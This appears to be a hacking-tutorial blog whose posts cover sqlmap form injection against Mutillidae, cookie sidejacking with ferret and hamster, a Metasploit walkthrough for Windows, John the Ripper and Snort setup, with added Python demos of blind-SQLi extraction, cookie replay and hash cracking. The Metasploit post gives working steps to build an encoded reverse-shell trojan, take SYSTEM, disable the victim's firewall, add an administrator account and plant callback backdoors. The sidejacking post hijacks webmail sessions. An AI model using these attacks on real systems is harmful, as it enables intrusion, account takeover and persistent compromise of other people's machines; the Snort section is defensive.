Wednesday, 28 May 2014

Blind SQL Injection for Forms fields using SqlMap


SQLMAP

Sqlmap is an automatic SQL injection tool written entirely in Python. Its goal is to detect and exploit SQL injection vulnerabilities in web applications. Once it has detected one or more injection points on the target, the user can choose among many options: fingerprint the back-end DBMS, retrieve the session user and current database, enumerate users, password hashes, privileges and databases, dump whole tables or selected columns, run arbitrary SELECT statements, read files from the file system, and much more.

Blind SQL Injection for Forms 

Here the vulnerable application is Mutillidae, which is vulnerable to SQL injection, and the attacker system is Kali Linux, where sqlmap is already installed. To see all the options available in sqlmap, run
sqlmap -h
If the login page contains a form with two parameters, user-name and password, then the sqlmap command is
sqlmap -u "https://172.16.221.129/mutillidae/index.php?page=login.php" --forms --dbs
Here 172.16.221.129 is the IP of my VirtualBox VM where Mutillidae is hosted. The URL is quoted so the shell does not treat the ? as a glob character.

The --forms option tells sqlmap to parse the HTML forms on the target page; it automatically identifies how many parameters (form fields) there are and tests each of them for injection.

--dbs enumerates the databases on the back-end DBMS.

After you hit Enter, sqlmap parses the form, shows the fields it found and asks whether you want to test this form. Enter y to continue the SQL injection.
sqlmap then asks whether you want to edit the request data it built from the form. Hit Enter to keep it.
Next it asks whether to fill the blank fields with random values; these are the baseline values into which sqlmap inserts its payloads. Hit y and Enter.

sqlmap now sends requests with its test payloads to look for an injection. If a field is injectable, it asks whether you want to exploit it. Hit y and Enter.



If the server answers with something unexpected, for example an HTTP 302 redirect, sqlmap asks whether you want to follow it. Hit n and Enter.


When the scan finishes sqlmap prints the list of databases.

As we can see there is a database named mutillidae. Now we fetch the data from this database. With -D databasename and --tables we can list the table names in the mutillidae database, so the command becomes
sqlmap -u "https://172.16.221.129/mutillidae/index.php?page=login.php" --forms -D mutillidae --tables
and answer the prompts as before. The result is the list of all tables in the database mutillidae.

Now we have all the tables in the database mutillidae and want every row of the accounts table. The command is
sqlmap -u "https://172.16.221.129/mutillidae/index.php?page=login.php" --forms -D mutillidae -T accounts --dump
-T sets the table name (accounts here) and --dump retrieves all the data inside it; sqlmap also saves the dump as CSV in its output directory.
The result will be
Now try to log in with one of the recovered username/password pairs. I am trying username patches and password tortoise.

Login is successful.

You can also set --threads, --risk and --level; the default for each is 1. --level (1 to 5) increases the number of payloads tried and the parameters tested (from level 2 the Cookie header is tested, from level 3 User-Agent and Referer too). --risk (1 to 3) adds heavier payloads: risk 2 adds heavy time-based queries and risk 3 adds OR-based boolean payloads. Higher values raise the chance of finding and exploiting an injection, but they take longer, and at risk 3 the OR-based payloads can modify or delete rows if the injection lands inside an UPDATE or DELETE statement, so use them only on targets you are authorised to test. --threads (up to 10) sends requests in parallel, which speeds up blind extraction considerably at the cost of more noise in the server logs.
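To show what sqlmap is doing behind those prompts when it reports a boolean-based blind injection in a form field, here is an added Python example (not sqlmap code and not part of the original post). A hypothetical login handler backed by an in-memory SQLite table with constructed rows stands in for Mutillidae's login page; its only output is logged-in or not, and that single bit is enough to recover a password character by character with a binary search. The same loop is run against a parameterised version of the handler to show it fail. The account rows and the handler are assumptions made for this example; only patches/tortoise comes from the post.

```python
import sqlite3

# Constructed sample rows, not the Mutillidae database. patches/tortoise is the
# pair the post logs in with; the other accounts are made up for this example.
SAMPLE_ACCOUNTS = [
    ("admin", "adminpass"),
    ("patches", "tortoise"),
    ("jeremy", "password"),
]


def make_db():
    """In-memory SQLite standing in for the MySQL back end of the vulnerable app."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def vulnerable_login(conn, username, password):
    """Hypothetical login handler that concatenates the two form fields into SQL.
    It only returns True/False (logged in or not): that single bit is the oracle
    a boolean-based blind injection reads."""
    sql = (f"SELECT 1 FROM accounts WHERE username='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """Same check with bound parameters; the input can no longer change the query."""
    sql = "SELECT 1 FROM accounts WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def oracle(login, conn, target_user, condition):
    """Ask one yes/no question about target_user's row through the username field.
    The injected -- comments out the rest of the query, including the password check."""
    payload = f"{target_user}' AND ({condition}) -- "
    return login(conn, payload, "x")


def binary_search(ask, lo, hi):
    """Smallest v in [lo, hi] for which ask(v) ('value > v') is False, i.e. the
    exact value, using about log2(hi - lo) oracle queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(login, conn, target_user, max_len=64):
    """Recover target_user's password with nothing but the login oracle.
    Returns None when the oracle never answers yes (no such user, or not injectable)."""
    length = binary_search(
        lambda n: oracle(login, conn, target_user, f"length(password) > {n}"),
        0, max_len)
    if length == 0:
        return None
    chars = []
    for i in range(1, length + 1):
        # unicode()/substr() are SQLite's names; MySQL would use ASCII()/SUBSTRING().
        code = binary_search(
            lambda c, i=i: oracle(
                login, conn, target_user,
                f"unicode(substr(password,{i},1)) > {c}"),
            32, 126)  # printable ASCII
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_password(vulnerable_login, db, "patches"))
    print("parameterised:", extract_password(safe_login, db, "patches"))
```

Each character costs about seven requests (log2 of the printable ASCII range) plus a handful for the length, which is why sqlmap's --threads speeds blind extraction up so much, and why the time-based variant of the same oracle (a SLEEP() instead of a true/false response) is so much slower.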











Thursday, 13 February 2014

Hacking into Users account by Side Jacking



Sidejacking is the process of stealing someone's access to a website, typically on public wireless networks. For a sidejacking attack to work, the application the victim is using must be talking plain HTTP, or at least sending its session cookie over HTTP. The attacker uses a packet sniffer to obtain the unencrypted session cookie that grants access to the application, then replays it from his own browser and impersonates the user: the cookie is the whole proof of identity, so no password is needed. Sites that serve everything over HTTPS and mark the session cookie Secure are not exposed to this; the HttpOnly flag does not help, because the cookie is read off the wire, not from a script.

1) Installing Ferret and Hamster in Ubuntu linux

sudo su
apt-get install libpcap-dev
Create a folder named sidejack in the root directory

mkdir /sidejack

cd /sidejack

wget http://www.erratasec.com/erratasec.zip

unzip erratasec.zip

mv hamster hamster2

cd hamster2/build/gcc4

make

cd /sidejack/ferret/build/gcc4

make

cd /sidejack

mkdir hamster

cp /sidejack/ferret/bin/ferret /sidejack/hamster

cp /sidejack/hamster2/bin/favicon.ico /sidejack/hamster

cp /sidejack/hamster2/bin/hamster /sidejack/hamster

cp /sidejack/hamster2/bin/hamster.css /sidejack/hamster

cp /sidejack/hamster2/bin/hamster.js /sidejack/hamster
2) Capture the traffic of any web login (gmail, hotmail etc.) with Wireshark (run it in promiscuous mode, or monitor mode on a wireless interface) and save the capture as test.pcap in /sidejack/hamster/, the directory both binaries were copied into above.
3) cd /sidejack/hamster/
4) ./ferret -r test.pcap (reads the capture and extracts the cookies and identifying details, such as the mail id, of the logged-in sessions)
5) ./hamster (starts the hamster proxy server on http://127.0.0.1:1234)
6) Configure your browser to use 127.0.0.1 port 1234 as its HTTP proxy.
7) Type http://hamster in your browser.
8) Click the victim's IP at the bottom of the page; it is listed together with the email address or login name it was seen using in the captured traffic.
9) In the right pane you see the captured cookies; click one of them to open the site with the victim's logged-in session. The session is now hijacked and you can do anything the user could do inside it.
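The ferret and hamster steps above are a sniff-and-replay of cookies, and the same mechanics fit in a few lines of Python. This is an added example, not ferret or hamster code and not part of the original post: it works on a constructed HTTP request and response (host, path and cookie values are made up), extracts the cookies the client sent in the clear, builds the forged request a proxy would replay, and, from the defender's side, flags the Set-Cookie headers that lack the Secure attribute, since those are the cookies a browser will also send over plain HTTP.

```python
# Constructed traffic, not a real capture: one request and one response as they
# would appear in a pcap taken on an open wireless network. Host and cookie
# values are made up.
SAMPLE_REQUEST = (
    b"GET /mail/inbox HTTP/1.1\r\n"
    b"Host: webmail.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: SESSIONID=8f3a2c91d0e4; lang=en\r\n"
    b"\r\n"
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Set-Cookie: SESSIONID=8f3a2c91d0e4; Path=/; HttpOnly\r\n"
    b"Set-Cookie: pref=dark; Path=/; Secure; HttpOnly\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def parse_headers(raw):
    """Split an HTTP message into (start line, [(name, value), ...]); names lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def sniff_cookies(raw_request):
    """What ferret does with a cleartext request: pull the Host and the Cookie
    header the client sent. Returns (host, {cookie name: value})."""
    _, headers = parse_headers(raw_request)
    host = next((v for n, v in headers if n == "host"), "")
    cookies = {}
    for name, value in headers:
        if name == "cookie":
            for pair in value.split(";"):
                k, _, v = pair.strip().partition("=")
                if k:
                    cookies[k] = v
    return host, cookies


def audit_set_cookie(raw_response):
    """Defender's view: which cookies did the server set without Secure? Those are
    the ones a browser will also send over plain HTTP and a sniffer can pick up.
    HttpOnly is irrelevant here; it only hides the cookie from scripts."""
    _, headers = parse_headers(raw_response)
    findings = {}
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].partition("=")[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        findings[cookie_name] = {
            "secure": "secure" in attrs,
            "httponly": "httponly" in attrs,
            "sidejackable": "secure" not in attrs,
        }
    return findings


def replay_request(host, cookies, path="/mail/inbox"):
    """What hamster's proxy does: a fresh request from the attacker's browser that
    carries the victim's cookies. No password is involved anywhere."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header}\r\n\r\n").encode()


if __name__ == "__main__":
    host, jar = sniff_cookies(SAMPLE_REQUEST)
    print(host, jar)
    print(audit_set_cookie(SAMPLE_RESPONSE))
    print(replay_request(host, jar).decode())
```

In the constructed response SESSIONID is HttpOnly but not Secure, so it is exactly the cookie a sidejacker wants; pref carries Secure and never travels over HTTP. A real capture holds hundreds of such pairs, which is all ferret is doing when it builds its list for hamster.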

Wednesday, 6 February 2013

Hack Windows 7 x64 / Windows XP x64 using Metasploit

First of all: don't use this for anything illegal. This tutorial is only for knowledge enhancement. Do it at your own risk and don't blame me for anything.

The tool required is Metasploit.

# Here are some examples of how the [] placeholders in the guide below are filled in:
# set LHOST [IP ADDRESS INT.] = set LHOST 192.168.1.15
# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"
# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg
# So when you input anything where there is [], remember to remove the []

-------------------------------------

cd /pentest/exploits/framework3/
svn up
# Update framework3 (BackTrack 4 paths; in later Metasploit releases msfpayload and msfencode were replaced by msfvenom)
clear
./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - how many times it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
# R emits the raw payload; msfencode encodes it -c times with shikata_ga_nai and injects it into the template EXE given with -x
# If you get an encoder error, find another EXE to use as template or encode it fewer times
# Copy the payload to the target

-------------------------------------

cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADDRESS INT.]
set LPORT [PORT] (the same port used in msfpayload in Shell 1)
show options
exploit


----------
# Now we wait for connection, so start the payload on victim computer
----------

use priv
ps
# Look for the PID of explorer.exe
migrate [PID of explorer]
getsystem
sysinfo
# If sysinfo shows an x64 system but the Meterpreter you uploaded is 32-bit (x86), hashdump won't work from that session; it needs a 64-bit Meterpreter or a migration into a 64-bit process
# Now we are in the system
-------------------------------------

shell
# Drops into CMD on the target
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming Terminal Services connections
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# fDenyTSConnections=0 is the value that actually enables Remote Desktop; 1 blocks it
netsh firewall set opmode enable
# Enable the firewall on the victim
netsh firewall set opmode disable
# Disable the firewall on the victim so RDP can reach it (the "netsh firewall" context is deprecated on Windows 7 but still works; "netsh advfirewall" is its replacement)
net user [USERNAME] [PASSWORD]
# Change the password of an existing user
# Or create your own user
net user [USERNAME] [PASSWORD] /add
net localgroup [GROUP] [USERNAME] /add
# For [GROUP] you could use "administrators"; [USERNAME] is the user you just created
net accounts /maxpwage:{[days]|unlimited}
# Examples: net accounts /maxpwage:6
# or: net accounts /maxpwage:unlimited

# CTRL + Z then Y backgrounds the channel and returns to Meterpreter without freezing the session

-------------------------------------

{Shell 3} (RDP to the compromised system)

# No need for ":" and [PORT] if the target is on the local network and RDP is on its default port
# Remember to be in "root@bt:~#", not inside the Meterpreter session
rdesktop [IP]:[port] -u "[USERNAME]"
run metsvc (installs the metsvc backdoor service for the next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADDRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# -X starts the agent at boot, -A starts a matching handler right away, -i 300 tells it to try to connect back every 300 sec. "run persistence -h" for more info
**UP- AND DOWNSIDES OF USING THESE***
METSVC:
VERY BAD: All 3 files it uses get flagged by Norton Internet Security 2011 as a trojan; other AVs may do this too!
BAD: If the victim's IP changes you have to know the new IP to connect back
GOOD: Easy to use
GOOD: It doesn't need YOUR IP and port!
PERSISTENCE:
BAD: It needs YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It is only detected as bad and removed when you run NPE (Norton Power Eraser), and that is a tool you must download separately!

-------------------------------------

{GET BACK INTO SYSTEM} (using metsvc, in a new terminal)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (metsvc listens on 31337 by default)
set RHOST [VICTIM IP ADDRESS]
show options (check that your setup is correct)
exploit

{GET BACK INTO SYSTEM} (using the persistence backdoor, in a new terminal)
cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADDRESS INT.]
set LPORT [PORT]
# The port set in the persistence backdoor
show options
exploit

----------
# Now we wait for connection, it will reconnect to your computer within 300 sec
----------

getuid
# If it returns "NT AUTHORITY\SYSTEM" and you want to act as the logged-in user, do this; otherwise skip to "use priv":
ps
# Find the PID of explorer.exe
steal_token [NUMBER - PID of explorer]
# From what I know it grants you the same rights as the user running that process
use priv
getsystem
------------------------------------

{Search} (in the meterpreter console)

search -f *.jpg
# Find all JPG files on the system
search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
# Find all JPG files in a specific folder
search -f test.txt
# Find a specific file on the whole system
{Uploading and Downloading} (how I use it)
# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on your BT4 desktop, write anything in it (or nothing) and save it as "test.txt". Then, in the meterpreter console (after you are connected to the victim), navigate to the desktop of the user currently logged in.
Use "pwd" (without quotes) to check that the path is correct; if it is, type the following:

{Upload}
upload /root/test.txt test.txt
# If you are uploading a file with a space in its name:
upload "/root/test 2.txt" "test 2.txt"
# Or, if you are not in the folder you want to upload to, give the destination path explicitly:
upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

{Download}
Explanation:
Now we download the file we just uploaded, "test.txt". Navigate to the folder if you are not already in it, using the "cd", "pwd" and "ls" commands.
Then type:
download test.txt /root/test.txt
# If you are downloading a file with a space in its name:
download "test 2.txt" "/root/test 2.txt"
# Or, if you are not in the folder the file is in but know its exact path and name (for example from search):
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"

Tuesday, 18 December 2012

John the Ripper, Password Cracker tool



John the Ripper is free and open source software and one of the best-known password crackers in use today.
It is the most widely used tool for cracking passwords in the Unix environment and is distributed primarily in source code form.
John the Ripper does not decrypt passwords: it takes candidate passwords, hashes them with the same algorithm as the stored hash (the traditional DES-based crypt(3) of Unix passwd files, among many other formats) and reports a match when the two hashes are equal.

Step 1: Download JTR.

Step 2: Extract JTR with the command

##--tar -xzf john-1.6.tar.gz

Step 3: Put the hashes to crack in a text file, one per line, in the same user:hash form as a Unix passwd file. The file name and extension do not matter; crackme.txt is just an example:

##--User:gyuJo098KkLy9

Save the file as crackme.txt, go to the prompt and type 'john crackme.txt'. Without further options John runs its cracking modes in order: single crack, then wordlist, then incremental (brute force). If you expect the password to be weak you can run single crack mode on its own. It builds candidates from the login name (and GECOS fields) with a few mangling rules, so it is very fast but only finds weak passwords.

##--john -single crackme.txt

Wordlist mode: uses a wordlist (basically a dictionary attack). It tries every word in the list, optionally mangled by rules, until it finds a match or reaches the end of the list. This is much quicker than incremental (brute-force) mode, but I don't recommend relying on it alone because it doesn't always find a match.

##--john -wordfile:password.lst crackme.txt

Restore: say you need to stop the crack in the middle. Press Ctrl+C (Ctrl+Break on Windows). John writes its state to a file named 'restore' in the JTR directory (no quotes, no file extension) and you can resume the crack from that point with

##--john -restore:restore

Session: use this if you know you will have to stop JTR in the middle of a crack. It writes the session state to a file of your choosing instead of the default one, so several interrupted cracks can be resumed independently later.

##--john -session:[save to filename] crackme.txt

Benchmark: shows how fast JTR runs each hash type on your computer

##--john -test
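To make the difference between the modes concrete, here is an added Python example (not John's code and not part of the original post) that reimplements the core of single crack mode and wordlist mode with rules over a constructed user:hash file. It uses SHA-256 instead of the DES-based crypt(3) of the example hash so it runs anywhere without the crypt module (the jumbo build of John reads the same format as raw-sha256); the mechanics are identical: hash the guess, compare, never decrypt. The user list, the wordlist and the mangling rules are small made-up stand-ins for a passwd file, password.lst and john.conf.

```python
import hashlib


def h(password):
    """The hash function of the 'password file'. John never inverts this; it only
    recomputes it for each guess and compares."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed user:hash entries in the form John reads (SHA-256 hex here instead
# of the 13-character DES crypt of the post, so the example runs everywhere).
SAMPLE_HASHES = {
    "alice": h("Alice1"),       # derived from the login name: single-crack territory
    "bob":   h("tortoise"),     # a plain dictionary word
    "carol": h("Summer2012!"),  # word + year + symbol: needs mangling rules
    "dave":  h("x9!Qv#2Lp"),    # random: none of these modes will get it
}

# A tiny wordlist standing in for John's password.lst (made up for the example).
WORDLIST = ["password", "tortoise", "summer", "winter", "letmein"]


def mangle(word):
    """A few john.conf-style rules: as typed, capitalised, upper-cased, and each
    of those with common digit/year/symbol suffixes appended."""
    bases = {word, word.capitalize(), word.upper()}
    candidates = set(bases)
    for base in bases:
        for suffix in ("1", "123", "2012", "2012!", "!"):
            candidates.add(base + suffix)
    return candidates


def single_mode(hashes):
    """Single crack mode: the candidates are the login name (John also uses the
    GECOS field) run through the rules. Fast, because the word set per user is tiny."""
    cracked = {}
    for user, target in hashes.items():
        for candidate in mangle(user):
            if h(candidate) == target:
                cracked[user] = candidate
                break
    return cracked


def wordlist_mode(hashes, wordlist, rules=True):
    """Wordlist mode: every word (optionally mangled) is hashed once and compared
    against every hash still uncracked. With unsalted hashes this is why cracking
    a thousand hashes costs about the same as cracking one."""
    cracked = {}
    pending = dict(hashes)
    for word in wordlist:
        for candidate in (mangle(word) if rules else {word}):
            digest = h(candidate)
            for user in [u for u, t in pending.items() if t == digest]:
                cracked[user] = candidate
                del pending[user]
    return cracked


def crack(hashes, wordlist):
    """John's default order: single crack first, then wordlist with rules.
    (Incremental/brute force would follow for whatever is left.)"""
    cracked = single_mode(hashes)
    remaining = {u: t for u, t in hashes.items() if u not in cracked}
    cracked.update(wordlist_mode(remaining, wordlist, rules=True))
    return cracked


if __name__ == "__main__":
    for user, pw in crack(SAMPLE_HASHES, WORDLIST).items():
        print(f"{user}:{pw}")
```

Only alice falls to single crack mode and only carol needs the rules; dave's random password survives all of it, which is what incremental mode is for and the reason it runs last. With salted hashes the "hash once, compare against everyone" trick in wordlist_mode stops working, and cracking N hashes really does cost N times as much.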

Sunday, 9 December 2012

hacking with Snort IDS/IPS

Snort
Snort is a free, lightweight network intrusion detection system for both UNIX and Windows.
Combining the benefits of signature, protocol and anomaly-based inspection, Snort is the most widely deployed IDS/IPS technology worldwide.
In this post I am going to show you how to install Snort from source, write rules and perform basic testing.

Download and Extract Snort

# cd /usr/src
# wget -O snort-2.8.6.1.tar.gz http://www.snort.org/downloads/116
# tar xvzf snort-2.8.6.1.tar.gz

Install Snort

Before installing Snort, make sure you have the development packages of libpcap and libpcre.
These are essential for building Snort (libmysqlclient-dev is needed later for the MySQL output plugin):

#apt-get install snort-mysql
#apt-get install libpcap0.8-dev
#apt-get install libnet1-dev
#apt-get install build-essential
#apt-get install checkinstall
#apt-get install libpcre3-dev
#apt-get install libmysqlclient12-dev


# cd snort-2.8.6.1
# ./configure
# make
# make install

Create the required files and directory
# mkdir /etc/snort
# mkdir /etc/snort/rules
# mkdir /var/log/snort

Copy two files into our new /etc/snort/rules directory:
- classification.config: defines the classtypes and their default priorities used by the rules.
- reference.config: defines the URL prefixes for the reference systems (bugtraq, cve, ...) cited in rules.


#cp snort-2.8.6.1/etc/classification.config /etc/snort/rules/
#cp snort-2.8.6.1/etc/reference.config /etc/snort/rules/


Create a user called snort to launch Snort:
#useradd snort -d /var/log/snort -s /bin/false -c SNORT_IDS

Make the log directory owned by the snort user:

#chown -R snort:snort /var/log/snort

To log into MySQL you first need to rerun "configure" so that it checks the dependencies and prepares Snort to be compiled with MySQL support, then run make and make install again as above:
#cd snort-2.8.6.1
#./configure --with-mysql

Create the following snort.conf and icmp.rules files:

# cat /etc/snort/snort.conf
include /etc/snort/rules/icmp.rules
# cat /etc/snort/rules/icmp.rules
alert icmp any any -> any any (msg:"ICMP Packet"; sid:477; rev:3;)

This rule fires on every ICMP packet in either direction, which is fine for a test but far too noisy for production. Note also that SIDs below 1,000,000 are reserved for the official Snort rule set (477 is one of them); give your own rules sid:1000001 and upwards so they cannot collide with a distributed rule.

Execute Snort

Start Snort from the command line as shown below (-c gives the configuration file, -l the log directory):
# snort -c /etc/snort/snort.conf -l /var/log/snort/
Ping some IP from your machine to trigger the ICMP rule, then look at the alert file:
# head /var/log/snort/alert
[**] [1:477:3] ICMP Packet [**]
[Priority: 0]
07/27-20:41:57.230345 > l/l len: 0 l/l type: 0x200 0:0:0:0:0:0
pkt type:0x4 proto: 0x800 len:0x64
209.85.231.102 -> 209.85.231.104 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:84 DF
Type:8  Code:0  ID:24905   Seq:1  ECHO


Alert detail
To see more of each alerting packet, run Snort with -d (dump the application-layer payload), -e (show the link-layer headers) and -v (verbose, print packets to the console), and pick the interface with -i:
# snort -dev -i ppp0 -c /etc/snort/snort.conf -l /var/log/snort/
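To see how Snort evaluates a rule like the one in icmp.rules above, here is an added Python example (not Snort code and not part of the original post) with a small matcher for the rule header (action, protocol, CIDR and port specs with ! negation, -> and <> directions) and the msg/sid/rev/itype options. It is run over the post's rule plus two constructed rules in the local SID range and a handful of constructed packets, the first being the ping from the alert output above, and prints alert lines in the same [gid:sid:rev] msg format that Snort writes to the alert file. The two extra rules, the packets and the simplifications noted in the comments are assumptions of this example.

```python
import ipaddress
import re

# Header: action proto src sport direction dst dport, then (options).
RULE_RE = re.compile(
    r"^(?P<action>alert|log|pass|drop)\s+(?P<proto>ip|icmp|tcp|udp)\s+"
    r"(?P<src>\S+)\s+(?P<sport>\S+)\s+(?P<dir>->|<>)\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$"
)

# The rule from the post plus two constructed ones (sids in the local range).
SAMPLE_RULES = [
    'alert icmp any any -> any any (msg:"ICMP Packet"; sid:477; rev:3;)',
    'alert icmp any any -> 10.0.0.0/8 any (msg:"ICMP echo request to internal net"; itype:8; sid:1000001; rev:1;)',
    'alert tcp !10.0.0.0/8 any -> 10.0.0.0/8 22 (msg:"Inbound SSH from outside"; sid:1000002; rev:1;)',
]

# Constructed packets. The first is the ping from the post's alert output.
SAMPLE_PACKETS = [
    {"proto": "icmp", "src": "209.85.231.102", "dst": "209.85.231.104", "itype": 8},
    {"proto": "icmp", "src": "192.0.2.5", "dst": "10.1.2.3", "itype": 8},
    {"proto": "icmp", "src": "192.0.2.5", "dst": "10.1.2.3", "itype": 0},
    {"proto": "tcp", "src": "198.51.100.7", "sport": 51515, "dst": "10.1.2.3", "dport": 22},
    {"proto": "tcp", "src": "10.1.2.3", "sport": 22, "dst": "198.51.100.7", "dport": 51515},
]


def parse_rule(text):
    """Split a rule into its header fields and an options dict.
    Simplification: option values may not themselves contain ';'."""
    m = RULE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparsable rule: {text}")
    rule = m.groupdict()
    opts = {}
    for item in rule.pop("opts").split(";"):
        if item.strip():
            key, _, value = item.strip().partition(":")
            opts[key.strip()] = value.strip().strip('"')
    rule["opts"] = opts
    return rule


def addr_match(spec, ip):
    """any, a single IP or CIDR, or a [a,b,...] list, optionally negated with !."""
    if spec == "any":
        return True
    negated = spec.startswith("!")
    nets = spec.lstrip("!").strip("[]").split(",")
    hit = any(ipaddress.ip_address(ip) in ipaddress.ip_network(n, strict=False) for n in nets)
    return hit != negated


def port_match(spec, port):
    """any, a single port, a lo:hi range (either end may be open), optionally negated."""
    if spec == "any":
        return True
    negated = spec.startswith("!")
    spec = spec.lstrip("!")
    if ":" in spec:
        lo, _, hi = spec.partition(":")
        hit = (int(lo) if lo else 0) <= port <= (int(hi) if hi else 65535)
    else:
        hit = port == int(spec)
    return hit != negated


def header_match(rule, pkt):
    def one_way(src, sport, dst, dport):
        return (addr_match(rule["src"], src) and port_match(rule["sport"], sport)
                and addr_match(rule["dst"], dst) and port_match(rule["dport"], dport))
    if rule["proto"] != "ip" and rule["proto"] != pkt["proto"]:
        return False
    sport, dport = pkt.get("sport", 0), pkt.get("dport", 0)
    ok = one_way(pkt["src"], sport, pkt["dst"], dport)
    if rule["dir"] == "<>":  # bidirectional: also try the swapped direction
        ok = ok or one_way(pkt["dst"], dport, pkt["src"], sport)
    return ok


def rule_matches(rule, pkt):
    if not header_match(rule, pkt):
        return False
    itype = rule["opts"].get("itype")  # the one payload option implemented here
    return itype is None or pkt.get("itype") == int(itype)


def alert_line(rule):
    """Same shape as the first line of Snort's alert file: [gid:sid:rev] msg."""
    o = rule["opts"]
    return f"[**] [1:{o.get('sid', '0')}:{o.get('rev', '1')}] {o.get('msg', '')} [**]"


def run(rule_texts, packets):
    rules = [parse_rule(r) for r in rule_texts if r.strip() and not r.lstrip().startswith("#")]
    return [alert_line(r) for pkt in packets for r in rules
            if r["action"] == "alert" and rule_matches(r, pkt)]


if __name__ == "__main__":
    for line in run(SAMPLE_RULES, SAMPLE_PACKETS):
        print(line)
```

The second rule shows why itype matters: with it, only echo requests into 10/8 fire, while the post's rule fires for every ICMP packet in both directions, including the echo reply. Real rule options (content, pcre, flow, thresholds) are far richer than this; the header logic, however, is the same as what Snort applies before looking at any payload.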

Configure the database

Set a password for the MySQL root user:
#mysqladmin -u root password new_root_password
Create the MySQL database (the tables are imported in the next step):
#mysql -u root -p
>create database snort;


 Packaged installation
If Snort came from the snort-mysql package, find the table schema with: dpkg -L snort-mysql
We are looking for the create_mysql.gz file; it is normally located in /usr/share/doc/snort-mysql.

#gzip -d /usr/share/doc/snort-mysql/create_mysql.gz
Import the MySQL tables:

#mysql -u root -p snort < /usr/share/doc/snort-mysql/create_mysql

 CONFIGURE SNORT FOR SQL

We now have to forward the logs into the MySQL database.
The database output plugin is already compiled in by the snort-mysql package (or by the --with-mysql build); we only need to configure the username and password used to access the snort database.
In /etc/snort/snort.conf, change the line between (#DBSTART#) and (#DBEND#):

output database: log, mysql, user=snortuser password=snortpassword dbname=snort host=localhost

Note that the snortuser account has to exist in MySQL with privileges on the snort database before Snort can write to it; the steps above only create the database and its tables.

Then uncomment the following lines:

ruletype redalert
{
type alert
output alert_syslog: LOG_AUTH LOG_ALERT
output database: log, mysql, user=snortuser password=snortpassword dbname=snort host=localhost
}
Start Snort!

snort -u snort -c /etc/snort/snort.conf

Snort starts under the snort user and loads the configuration stored in /etc/snort/snort.conf.


To start Snort automatically after a reboot, add a line to /etc/crontab:

@reboot root snort -u snort -c /etc/snort/snort.conf >> /dev/null